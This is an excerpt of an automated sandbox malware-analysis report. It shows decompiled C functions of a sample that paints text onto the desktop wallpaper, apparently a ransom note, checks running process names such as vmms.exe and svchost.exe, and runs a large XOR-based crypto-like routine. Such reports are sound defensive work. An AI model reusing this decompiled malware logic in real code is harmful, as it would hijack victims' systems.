                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C4B21(void* _a4) {
                                                                                                                                                            				void* _t3;
                                                                                                                                                            				int _t4;
                                                                                                                                                            
                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                            					_t4 = FindCloseChangeNotification(_a4); // executed
                                                                                                                                                            					return _t4;
                                                                                                                                                            				}
                                                                                                                                                            				return _t3;
                                                                                                                                                            			}






                                                                                                                                                            APIs
                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                            			E009C453E() {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				struct HDC__* _v20;
                                                                                                                                                            				void* _v24;
                                                                                                                                                            				int _v28;
                                                                                                                                                            				struct HDC__* _v32;
                                                                                                                                                            				int _v36;
                                                                                                                                                            				void* _v40;
                                                                                                                                                            				struct tagRECT _v56;
                                                                                                                                                            				struct HDC__* _t56;
                                                                                                                                                            				int _t59;
                                                                                                                                                            				int _t60;
                                                                                                                                                            				int _t61;
                                                                                                                                                            				void* _t62;
                                                                                                                                                            				int _t67;
                                                                                                                                                            				void* _t68;
                                                                                                                                                            				struct HBRUSH__* _t73;
                                                                                                                                                            				signed int _t77;
                                                                                                                                                            				int _t91;
                                                                                                                                                            				signed int _t92;
                                                                                                                                                            				signed int _t94;
                                                                                                                                                            				signed int _t96;
                                                                                                                                                            				struct HDC__* _t101;
                                                                                                                                                            				struct HDC__* _t102;
                                                                                                                                                            				signed int _t104;
                                                                                                                                                            				signed int _t111;
                                                                                                                                                            				signed int _t112;
                                                                                                                                                            				signed char _t114;
                                                                                                                                                            				int _t121;
                                                                                                                                                            				void* _t123;
                                                                                                                                                            				struct HDC__* _t128;
                                                                                                                                                            				int _t132;
                                                                                                                                                            				int _t133;
                                                                                                                                                            				void* _t134;
                                                                                                                                                            
                                                                                                                                                            				_t56 = GetDC(0);
                                                                                                                                                            				_t101 = _t56;
                                                                                                                                                            				_v32 = _t101;
                                                                                                                                                            				if(_t101 != 0) {
                                                                                                                                                            					_t128 = CreateCompatibleDC(_t101);
                                                                                                                                                            					_v20 = _t128;
                                                                                                                                                            					if(_t128 == 0) {
                                                                                                                                                            						L17:
                                                                                                                                                            						return ReleaseDC(0, _t101);
                                                                                                                                                            					}
                                                                                                                                                            					_t59 = GetDeviceCaps(_t101, 8);
                                                                                                                                                            					_t121 = _t59;
                                                                                                                                                            					_t60 = 0xa;
                                                                                                                                                            					_v28 = _t121;
                                                                                                                                                            					_v16 = _t60;
                                                                                                                                                            					_t61 = GetDeviceCaps(_t101, _t60);
                                                                                                                                                            					_v8 = _t61;
                                                                                                                                                            					_t62 = CreateCompatibleBitmap(_t101, _t121, _t61);
                                                                                                                                                            					_v24 = _t62;
                                                                                                                                                            					if(_t62 == 0) {
                                                                                                                                                            						L16:
                                                                                                                                                            						DeleteDC(_t128);
                                                                                                                                                            						goto L17;
                                                                                                                                                            					}
                                                                                                                                                            					SelectObject(_t128, _t62);
                                                                                                                                                            					_t67 =  ~(MulDiv(0x12, GetDeviceCaps(_t101, 0x5a), 0x48));
                                                                                                                                                            					_v36 = _t67;
                                                                                                                                                            					_t68 = CreateFontW(_t67, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, 0);
                                                                                                                                                            					_v40 = _t68;
                                                                                                                                                            					if(_t68 == 0) {
                                                                                                                                                            						L15:
                                                                                                                                                            						DeleteObject(_v24);
                                                                                                                                                            						goto L16;
                                                                                                                                                            					}
                                                                                                                                                            					SelectObject(_t128, _t68);
                                                                                                                                                            					SetBkMode(_t128, 1);
                                                                                                                                                            					SetTextColor(_t128, 0xffffff);
                                                                                                                                                            					_t73 = GetStockObject(2);
                                                                                                                                                            					_v56.left = _v56.left & 0x00000000;
                                                                                                                                                            					_v56.top = _v56.top & 0x00000000;
                                                                                                                                                            					_v56.right = _t121;
                                                                                                                                                            					_v56.bottom = _v8;
                                                                                                                                                            					FillRect(_t128,  &_v56, _t73);
                                                                                                                                                            					_t104 = _v8;
                                                                                                                                                            					_t77 = _t104 * _t121;
                                                                                                                                                            					asm("cdq");
                                                                                                                                                            					_t114 = _t77 % _v16;
                                                                                                                                                            					if(_t77 / _v16 <= 0) {
                                                                                                                                                            						L12:
                                                                                                                                                            						asm("cdq");
                                                                                                                                                            						asm("cdq");
                                                                                                                                                            						_v56.top = (_v56.bottom - _t114 >> 1) - (_v8 - _t114 >> 1) - _v36;
                                                                                                                                                            						DrawTextW(_t128,  *0x9d2204, 0xffffffff,  &_v56, 0x11);
                                                                                                                                                            						_t123 = E009C4439(_t114, _t144);
                                                                                                                                                            						if(_t123 != 0) {
                                                                                                                                                            							E009C4284(_t114, _v24, _t101, _t123);
                                                                                                                                                            							SystemParametersInfoW(0x14, 0, _t123, 3);
                                                                                                                                                            							E009C47F8(_t123);
                                                                                                                                                            						}
                                                                                                                                                            						DeleteObject(_v40);
                                                                                                                                                            						goto L15;
                                                                                                                                                            					}
                                                                                                                                                            					_t91 = 0;
                                                                                                                                                            					_v12 = 0;
                                                                                                                                                            					if(_t121 <= 0) {
                                                                                                                                                            						goto L12;
                                                                                                                                                            					}
                                                                                                                                                            					_t102 = _t128;
                                                                                                                                                            					do {
                                                                                                                                                            						_v16 = _v16 & 0x00000000;
                                                                                                                                                            						if(_t104 <= 0) {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L8;
                                                                                                                                                            						}
                                                                                                                                                            						do {
                                                                                                                                                            							L8:
                                                                                                                                                            							_t92 = E009C544B(_t114, 0, 0xffffffff);
                                                                                                                                                            							_t94 = E009C544B(_t92 % 0xc8, 0, 0xffffffff);
                                                                                                                                                            							_t111 = 0x1e;
                                                                                                                                                            							_t96 = E009C544B(_t94 % _t111, 0, 0xffffffff);
                                                                                                                                                            							_t134 = _t134 + 0x18;
                                                                                                                                                            							_t132 = _v16;
                                                                                                                                                            							_t112 = 0x1e;
                                                                                                                                                            							_t114 = _t96 % _t112;
                                                                                                                                                            							SetPixel(_t102, _v12, _t132, _t114 & 0x000000ff | (_t94 % _t111 & 0x000000ff | (_t92 % 0x000000c8 & 0x000000ff) << 0x00000008) << 0x00000008);
                                                                                                                                                            							_t104 = _v8;
                                                                                                                                                            							_t133 = _t132 + 1;
                                                                                                                                                            							_v16 = _t133;
                                                                                                                                                            						} while (_t133 < _t104);
                                                                                                                                                            						_t121 = _v28;
                                                                                                                                                            						_t91 = _v12;
                                                                                                                                                            						L10:
                                                                                                                                                            						_t91 = _t91 + 1;
                                                                                                                                                            						_v12 = _t91;
                                                                                                                                                            						_t144 = _t91 - _t121;
                                                                                                                                                            					} while (_t91 < _t121);
                                                                                                                                                            					_t101 = _v32;
                                                                                                                                                            					_t128 = _v20;
                                                                                                                                                            					goto L12;
                                                                                                                                                            				}
                                                                                                                                                            				return _t56;
                                                                                                                                                            			}







































                                                                                                                                                            APIs
                                                                                                                                                            • GetDC.USER32(00000000), ref: 009C4547
                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 009C455C
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 009C4573
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 009C4586
                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 009C4592
                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 009C45A5
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009C45AE
                                                                                                                                                            • MulDiv.KERNEL32(00000012,00000000,00000048), ref: 009C45B9
                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 009C45D6
                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 009C45E9
                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 009C45F2
                                                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 009C45FE
                                                                                                                                                            • GetStockObject.GDI32(00000002), ref: 009C4606
                                                                                                                                                            • FillRect.USER32(00000000,00000000,00000000), ref: 009C4623
                                                                                                                                                            • SetPixel.GDI32(00000000,?,00000000,00000000), ref: 009C46A5
                                                                                                                                                            • DrawTextW.USER32(00000000,000000FF,00000000,00000011,?), ref: 009C46F3
                                                                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 009C4718
                                                                                                                                                            • DeleteObject.GDI32(?), ref: 009C4728
                                                                                                                                                            • DeleteObject.GDI32(?), ref: 009C4731
                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 009C4738
                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 009C4742
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Object$CapsCreateDeleteDevice$CompatibleSelectText$BitmapColorDrawFillFontInfoModeParametersPixelRectReleaseStockSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 830383330-0
                                                                                                                                                            • Opcode ID: 6938585bfe26d5144c72f17f0fe51bf68f5a39e7d6828ab56b43f21bc43d2825
                                                                                                                                                            • Instruction ID: 5e1b8e778e4d2645bee965dac130e16e4364e1f206b100f2a3ee3d4e5142a343
                                                                                                                                                            • Opcode Fuzzy Hash: 6938585bfe26d5144c72f17f0fe51bf68f5a39e7d6828ab56b43f21bc43d2825
                                                                                                                                                            • Instruction Fuzzy Hash: C651F3B2E55215BFEB049FA4DC49FAE7BB9EF89311F10021AFA11E62D0DB704D409B61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 36%
                                                                                                                                                            			E009C4964(long _a4) {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				WCHAR* _t4;
                                                                                                                                                            				void* _t6;
                                                                                                                                                            				signed int _t15;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            
                                                                                                                                                            				_t4 =  *0x9d1d7c; // 0x0
                                                                                                                                                            				_v8 = 0x800;
                                                                                                                                                            				_push(0x800);
                                                                                                                                                            				if(_t4 != 0) {
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push(_t4);
                                                                                                                                                            					E009C4832();
                                                                                                                                                            				} else {
                                                                                                                                                            					 *0x9d1d7c = E009C47AB();
                                                                                                                                                            				}
                                                                                                                                                            				_t6 = OpenProcess(0x1000, 0, _a4);
                                                                                                                                                            				_t31 = _t6;
                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                            					 *0x9d1010(_t31, 0,  *0x9d1d7c,  &_v8);
                                                                                                                                                            					E009C4B21(_t31);
                                                                                                                                                            					_t33 = PathFindFileNameW( *0x9d1d7c);
                                                                                                                                                            					if(E009C6146(_t10, L"vmcompute.exe") != 0) {
                                                                                                                                                            						if(E009C6146(_t33, L"vmms.exe") == 0 || E009C6146(_t33, L"vmwp.exe") == 0) {
                                                                                                                                                            							goto L5;
                                                                                                                                                            						} else {
                                                                                                                                                            							_t15 = E009C6146(_t33, L"svchost.exe");
                                                                                                                                                            							asm("sbb eax, eax");
                                                                                                                                                            							_t6 =  ~_t15 + 1;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						L5:
                                                                                                                                                            						_t6 = 1;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return _t6;
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,009C5B66,?,?,009C5B66,?), ref: 009C499D
                                                                                                                                                            • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?,009C5B66,?), ref: 009C49B6
                                                                                                                                                            • PathFindFileNameW.SHLWAPI(?,009C5B66,?), ref: 009C49C9
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$HeapName$CreateFileFindFullImageOpenPathQuery
                                                                                                                                                            • String ID: svchost.exe$vmcompute.exe$vmms.exe$vmwp.exe
                                                                                                                                                            • API String ID: 2112901129-1116827676
                                                                                                                                                            • Opcode ID: 3539a0b2a83a68cf96a7eebd5cae86d5de6599ef4bed53a2109a076a4e04d927
                                                                                                                                                            • Instruction ID: c38d92889dfe1a9071561c205938ebe47d1cb3846aa5b2b29fd9756bd483ffa9
                                                                                                                                                            • Opcode Fuzzy Hash: 3539a0b2a83a68cf96a7eebd5cae86d5de6599ef4bed53a2109a076a4e04d927
                                                                                                                                                            • Instruction Fuzzy Hash: 4911233BE9E6127FE6186770BC12F6A376C8B46764F24402FF901D11C1EB20894096AB
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009CAB95(signed int* _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int* _v44;
                                                                                                                                                            				signed int _t706;
                                                                                                                                                            				signed int _t722;
                                                                                                                                                            				signed int _t736;
                                                                                                                                                            				signed int _t768;
                                                                                                                                                            				signed int* _t836;
                                                                                                                                                            				signed int* _t863;
                                                                                                                                                            				signed int* _t890;
                                                                                                                                                            				signed int* _t917;
                                                                                                                                                            				signed int* _t944;
                                                                                                                                                            				signed int _t969;
                                                                                                                                                            				signed int* _t985;
                                                                                                                                                            				unsigned int _t986;
                                                                                                                                                            				signed int _t988;
                                                                                                                                                            				signed int* _t989;
                                                                                                                                                            				signed int _t990;
                                                                                                                                                            				signed int _t991;
                                                                                                                                                            				signed int _t993;
                                                                                                                                                            				signed int _t995;
                                                                                                                                                            				signed int _t997;
                                                                                                                                                            				signed int _t999;
                                                                                                                                                            				signed int _t1001;
                                                                                                                                                            				signed int _t1003;
                                                                                                                                                            				signed int _t1005;
                                                                                                                                                            				signed int _t1007;
                                                                                                                                                            				signed int _t1009;
                                                                                                                                                            				signed int _t1011;
                                                                                                                                                            				signed int _t1013;
                                                                                                                                                            				signed int* _t1016;
                                                                                                                                                            				signed int* _t1018;
                                                                                                                                                            				signed int* _t1020;
                                                                                                                                                            				signed int* _t1022;
                                                                                                                                                            				signed int* _t1024;
                                                                                                                                                            				signed int _t1034;
                                                                                                                                                            				signed int* _t1050;
                                                                                                                                                            				unsigned int _t1051;
                                                                                                                                                            				signed int* _t1066;
                                                                                                                                                            				signed int _t1067;
                                                                                                                                                            				signed int* _t1084;
                                                                                                                                                            				signed int* _t1099;
                                                                                                                                                            				unsigned int _t1100;
                                                                                                                                                            				signed int* _t1116;
                                                                                                                                                            				signed int _t1189;
                                                                                                                                                            				signed int _t1211;
                                                                                                                                                            				signed int _t1233;
                                                                                                                                                            				signed int _t1255;
                                                                                                                                                            				signed int _t1277;
                                                                                                                                                            				signed int* _t1299;
                                                                                                                                                            				signed int* _t1300;
                                                                                                                                                            				signed int _t1312;
                                                                                                                                                            				signed int _t1316;
                                                                                                                                                            				signed int _t1319;
                                                                                                                                                            				signed int _t1323;
                                                                                                                                                            				signed int _t1327;
                                                                                                                                                            				signed int _t1330;
                                                                                                                                                            				signed int _t1332;
                                                                                                                                                            				signed int* _t1334;
                                                                                                                                                            				signed int _t1335;
                                                                                                                                                            				signed int* _t1337;
                                                                                                                                                            				signed int _t1338;
                                                                                                                                                            				signed int* _t1340;
                                                                                                                                                            				signed int _t1341;
                                                                                                                                                            				signed int* _t1343;
                                                                                                                                                            				signed int _t1344;
                                                                                                                                                            				signed int* _t1346;
                                                                                                                                                            				signed int _t1347;
                                                                                                                                                            				signed int* _t1349;
                                                                                                                                                            				signed int _t1350;
                                                                                                                                                            				signed int* _t1352;
                                                                                                                                                            				signed int _t1353;
                                                                                                                                                            				signed int* _t1355;
                                                                                                                                                            				unsigned int _t1356;
                                                                                                                                                            				signed int* _t1358;
                                                                                                                                                            				unsigned int _t1359;
                                                                                                                                                            				signed int _t1361;
                                                                                                                                                            				signed int* _t1363;
                                                                                                                                                            				unsigned int _t1364;
                                                                                                                                                            				signed int _t1366;
                                                                                                                                                            				signed int* _t1367;
                                                                                                                                                            				signed int _t1368;
                                                                                                                                                            				signed int* _t1369;
                                                                                                                                                            				signed int _t1370;
                                                                                                                                                            				signed int* _t1371;
                                                                                                                                                            				signed int _t1372;
                                                                                                                                                            				signed int* _t1373;
                                                                                                                                                            				signed int _t1374;
                                                                                                                                                            				signed int* _t1375;
                                                                                                                                                            				signed int _t1380;
                                                                                                                                                            				signed int* _t1382;
                                                                                                                                                            				unsigned int _t1383;
                                                                                                                                                            				signed int _t1385;
                                                                                                                                                            				signed int _t1387;
                                                                                                                                                            				signed int _t1389;
                                                                                                                                                            				signed int _t1391;
                                                                                                                                                            				signed int _t1393;
                                                                                                                                                            				signed int _t1395;
                                                                                                                                                            				signed int _t1397;
                                                                                                                                                            				signed int _t1399;
                                                                                                                                                            				signed int _t1401;
                                                                                                                                                            				signed int* _t1403;
                                                                                                                                                            				signed int _t1404;
                                                                                                                                                            				intOrPtr* _t1406;
                                                                                                                                                            				signed int _t1407;
                                                                                                                                                            				signed int* _t1408;
                                                                                                                                                            				signed int _t1409;
                                                                                                                                                            				signed int* _t1410;
                                                                                                                                                            				signed int _t1411;
                                                                                                                                                            				signed int* _t1412;
                                                                                                                                                            				signed int _t1413;
                                                                                                                                                            				signed int* _t1414;
                                                                                                                                                            				signed int _t1415;
                                                                                                                                                            				signed int* _t1416;
                                                                                                                                                            				signed int _t1419;
                                                                                                                                                            				signed int _t1424;
                                                                                                                                                            				signed int _t1428;
                                                                                                                                                            				signed int _t1433;
                                                                                                                                                            				signed int _t1438;
                                                                                                                                                            				signed int _t1441;
                                                                                                                                                            				signed int* _t1443;
                                                                                                                                                            				signed int _t1444;
                                                                                                                                                            				signed int* _t1446;
                                                                                                                                                            				signed int _t1447;
                                                                                                                                                            				signed int* _t1449;
                                                                                                                                                            				signed int _t1450;
                                                                                                                                                            				signed int* _t1452;
                                                                                                                                                            				signed int _t1453;
                                                                                                                                                            				signed int* _t1455;
                                                                                                                                                            				signed int _t1456;
                                                                                                                                                            				signed int* _t1458;
                                                                                                                                                            				signed int _t1459;
                                                                                                                                                            				signed int* _t1461;
                                                                                                                                                            				signed int _t1462;
                                                                                                                                                            				signed int* _t1464;
                                                                                                                                                            				signed int _t1465;
                                                                                                                                                            				signed int* _t1467;
                                                                                                                                                            				signed int _t1468;
                                                                                                                                                            				signed int _t1470;
                                                                                                                                                            				signed int _t1472;
                                                                                                                                                            				signed int _t1474;
                                                                                                                                                            				signed int _t1475;
                                                                                                                                                            				signed int _t1476;
                                                                                                                                                            				signed int _t1477;
                                                                                                                                                            				signed int _t1478;
                                                                                                                                                            
                                                                                                                                                            				_t1416 = _a4;
                                                                                                                                                            				_v44 = 0x9cfb38;
                                                                                                                                                            				do {
                                                                                                                                                            					_t3 =  &(_t1416[4]); // 0xff348d8d
                                                                                                                                                            					_t4 =  &(_t1416[0xe]); // 0x1174ff85
                                                                                                                                                            					_t5 =  &(_t1416[0x18]); // 0x5fffc883
                                                                                                                                                            					_t6 =  &(_t1416[0x22]); // 0x88
                                                                                                                                                            					_t7 =  &(_t1416[0x2c]); // 0xa48e
                                                                                                                                                            					_t8 =  &(_t1416[0xa]); // 0x3e
                                                                                                                                                            					_t9 =  &(_t1416[0x14]); // 0xffff34bd
                                                                                                                                                            					_t10 =  &(_t1416[0x1e]); // 0x9cfb38d8
                                                                                                                                                            					_t11 =  &(_t1416[0x28]); // 0x8b000000
                                                                                                                                                            					_t12 =  &(_t1416[1]); // 0x3b590845
                                                                                                                                                            					_t13 =  &(_t1416[0xb]); // 0x308458b
                                                                                                                                                            					_t14 =  &(_t1416[0x15]); // 0xc8b9ff
                                                                                                                                                            					_t15 =  &(_t1416[0x1f]); // 0x105e8b00
                                                                                                                                                            					_t16 =  &(_t1416[0x29]); // 0x4e33044e
                                                                                                                                                            					_t17 =  &(_t1416[5]); // 0x5051ffff
                                                                                                                                                            					_t18 =  &(_t1416[0xf]); // 0x34958d57
                                                                                                                                                            					_t19 =  &(_t1416[0x19]); // 0xe58b5b5e
                                                                                                                                                            					_t20 =  &(_t1416[0x23]); // 0xb09e33
                                                                                                                                                            					_t21 =  &(_t1416[0x2d]); // 0x14568b00
                                                                                                                                                            					_t22 =  &(_t1416[8]); // 0xff34858d
                                                                                                                                                            					_t23 =  &(_t1416[0x12]); // 0xc483ffff
                                                                                                                                                            					_t24 =  &(_t1416[0x1c]); // 0x758b5653
                                                                                                                                                            					_t25 =  &(_t1416[0x26]); // 0x46335046
                                                                                                                                                            					_t26 =  &(_t1416[0x30]); // 0x8c
                                                                                                                                                            					_t1380 =  *_t22 ^  *_t23 ^  *_t24 ^  *_t25 ^  *_t26;
                                                                                                                                                            					_v12 =  *_t3 ^  *_t4 ^  *_t5 ^  *_t6 ^  *_t7;
                                                                                                                                                            					_t28 =  &(_t1416[6]); // 0xff9cc5e8
                                                                                                                                                            					_t29 =  &(_t1416[0x10]); // 0x52ffffff
                                                                                                                                                            					_t30 =  &(_t1416[0x1a]); // 0x8b55c35d
                                                                                                                                                            					_t31 =  &(_t1416[0x24]); // 0x68b0000
                                                                                                                                                            					_t32 =  &(_t1416[0x2e]); // 0x333c5633
                                                                                                                                                            					_v20 =  *_t1416 ^  *_t8 ^  *_t9 ^  *_t10 ^  *_t11;
                                                                                                                                                            					_t34 =  &(_t1416[2]); // 0x852d72fe
                                                                                                                                                            					_t35 =  &(_t1416[0xc]); // 0x89fe2bc6
                                                                                                                                                            					_t36 =  &(_t1416[0x16]); // 0xaaf30000
                                                                                                                                                            					_t37 =  &(_t1416[0x20]); // 0x33385e33
                                                                                                                                                            					_t38 =  &(_t1416[0x2a]); // 0x544e332c
                                                                                                                                                            					_t706 =  *_t34 ^  *_t35 ^  *_t36 ^  *_t37 ^  *_t38;
                                                                                                                                                            					_v16 =  *_t12 ^  *_t13 ^  *_t14 ^  *_t15 ^  *_t16;
                                                                                                                                                            					_t40 =  &(_t1416[3]); // 0x561174f6
                                                                                                                                                            					_t41 =  &(_t1416[0xd]); // 0xceeb0845
                                                                                                                                                            					_t42 =  &(_t1416[0x17]); // 0x3ebc033
                                                                                                                                                            					_t43 =  &(_t1416[0x21]); // 0x9e33605e
                                                                                                                                                            					_t44 =  &(_t1416[0x2b]); // 0x337c4e33
                                                                                                                                                            					_t1034 =  *_t40 ^  *_t41 ^  *_t42 ^  *_t43 ^  *_t44;
                                                                                                                                                            					_v40 =  *_t17 ^  *_t18 ^  *_t19 ^  *_t20 ^  *_t21;
                                                                                                                                                            					_t46 =  &(_t1416[7]); // 0xcc483ff
                                                                                                                                                            					_t47 =  &(_t1416[0x11]); // 0x9c98e850
                                                                                                                                                            					_t48 =  &(_t1416[0x1b]); // 0x28ec83ec
                                                                                                                                                            					_t49 =  &(_t1416[0x25]); // 0x33284633
                                                                                                                                                            					_t50 =  &(_t1416[0x2f]); // 0x96336456
                                                                                                                                                            					_v32 =  *_t28 ^  *_t29 ^  *_t30 ^  *_t31 ^  *_t32;
                                                                                                                                                            					_t52 =  &(_t1416[9]); // 0xe850ffff
                                                                                                                                                            					_t53 =  &(_t1416[0x13]); // 0x8dc0320c
                                                                                                                                                            					_t54 =  &(_t1416[0x1d]); // 0x45c75708
                                                                                                                                                            					_t55 =  &(_t1416[0x27]); // 0xa0863378
                                                                                                                                                            					_t56 =  &(_t1416[0x31]); // 0xb49633
                                                                                                                                                            					_v24 = _t706;
                                                                                                                                                            					_v28 = _t1034;
                                                                                                                                                            					_v36 =  *_t46 ^  *_t47 ^  *_t48 ^  *_t49 ^  *_t50;
                                                                                                                                                            					_t1419 = _t1034 >> 0x0000001f | _t706 + _t706;
                                                                                                                                                            					_v8 =  *_t52 ^  *_t53 ^  *_t54 ^  *_t55 ^  *_t56;
                                                                                                                                                            					_t985 = _a4;
                                                                                                                                                            					_t1312 = (_t1034 << 0x00000020 | _t706) << 1;
                                                                                                                                                            					_t67 =  &(_t985[1]); // 0x3b590845
                                                                                                                                                            					 *_t985 = _t1419 ^  *_a4 ^ _t1380;
                                                                                                                                                            					_t985[1] = _t1312 ^  *_t67 ^ _v8;
                                                                                                                                                            					_t985[0xa] = _t985[0xa] ^ _t1419 ^ _t1380;
                                                                                                                                                            					_t985[0xb] = _t985[0xb] ^ _t1312 ^ _v8;
                                                                                                                                                            					_t75 =  &(_t985[0x14]); // 0xffff34bd
                                                                                                                                                            					_t76 =  &(_t985[0x15]); // 0xc8b9ff
                                                                                                                                                            					_t985[0x14] = _t1419 ^  *_t75 ^ _t1380;
                                                                                                                                                            					_t985[0x15] = _t1312 ^  *_t76 ^ _v8;
                                                                                                                                                            					_t80 =  &(_t985[0x1e]); // 0x9cfb38d8
                                                                                                                                                            					_t81 =  &(_t985[0x1f]); // 0x105e8b00
                                                                                                                                                            					_t985[0x1e] = _t1419 ^  *_t80 ^ _t1380;
                                                                                                                                                            					_t1050 = _t985;
                                                                                                                                                            					_t1050[0x1f] = _t1312 ^  *_t81 ^ _v8;
                                                                                                                                                            					_t85 =  &(_t1050[0x28]); // 0x8b000000
                                                                                                                                                            					_t86 =  &(_t1050[0x29]); // 0x4e33044e
                                                                                                                                                            					_t1050[0x28] = _t1419 ^  *_t85 ^ _t1380;
                                                                                                                                                            					_t1050[0x29] = _t1312 ^  *_t86 ^ _v8;
                                                                                                                                                            					_t1051 = _v40;
                                                                                                                                                            					_t722 = _v12;
                                                                                                                                                            					_t1316 = (_t1051 << 0x00000020 | _t722) << 1;
